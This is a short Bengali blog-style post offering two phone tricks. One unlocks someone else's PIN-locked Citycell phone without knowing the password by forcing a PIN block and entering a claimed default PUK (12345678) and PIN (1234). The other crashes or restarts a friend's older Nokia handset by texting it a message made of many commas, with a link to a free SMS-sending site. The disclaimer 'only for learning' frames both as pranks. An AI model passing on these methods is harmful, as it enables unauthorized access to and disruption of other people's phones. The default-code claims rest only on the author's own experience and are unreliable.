কারো সিটিসেল ফোন যদি পিন দিযে লক করা থাকে তাহলে আপনি পাসওয়ার্ড না জেনেও খুলতে পারবেন। এজন্য আপনি ভুল কযেকটি পাসওয়ার্ড দিন পিন ব্লক হয়ে গেলে পাক কোড চাইবে। আর বেশীর ভাগ সিটিসেল ফোনে অন্তত আমি যতগুলো দেখেছি এখন পযর্ন্ত সবগুলোর পাক কোড ১২৩৪৫৬৭৮। এবার এই পাক কোড দিয়ে আর যথারীতি পিন ১২৩৪ দিয়ে ফোনটি আনলক করুন। এভাবে সিটিসেল মোবাইলের পিন লক থাকলেও না জেনেই সহজে খুলতে পারেন।
দয়া করে কার ক্ষতি করবেন না।
এটা শুধু শিখার জন্য। please আইটার ব্যাড ইয়ুস করবেন না।

send sms to your friends and restart her mobile

আসুন শিখে ফেলি কিভাবে আপনি SMS পাঠিয়ে আপনার বন্ধুদের মোবাইল রিস্ট্রাট করে দিতে পারেন। এটা খুব। মজার একটা বিষয় শুধু মাত্র নিচের কোড টি SMS করে পাঠিয়ে দিলেই ফোন রিস্ট্রাট হবে। এই জিনিসটা শুধু  Nokia- 1110,1110i,1112,1100,2100 মডেলের হজ্যান্ডসেট গুলো রিস্ট্রাট দিতে পারে।
কোড
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
শুধু  উপরের কোডটি মেসেজ বক্সে টাইপ করে সেন্ড করে দিন আপনার Nokia- 1110, 1110i, 1112, 1100, 2100 মডেলের নোকিয়া সেটের নাম্বারের।
আপনার মোবাইল থেকে এসএমএস পাঠেতে টাকা লাগবে, তাই আমি আপনাদের শিখিয়ে দিচ্ছি  কিভাবে নেট থেকে ফ্রী এসএমএস পাঠানো যায়।
http://uthsms.net/?on=sms

সবাই ভাল থাকবেন…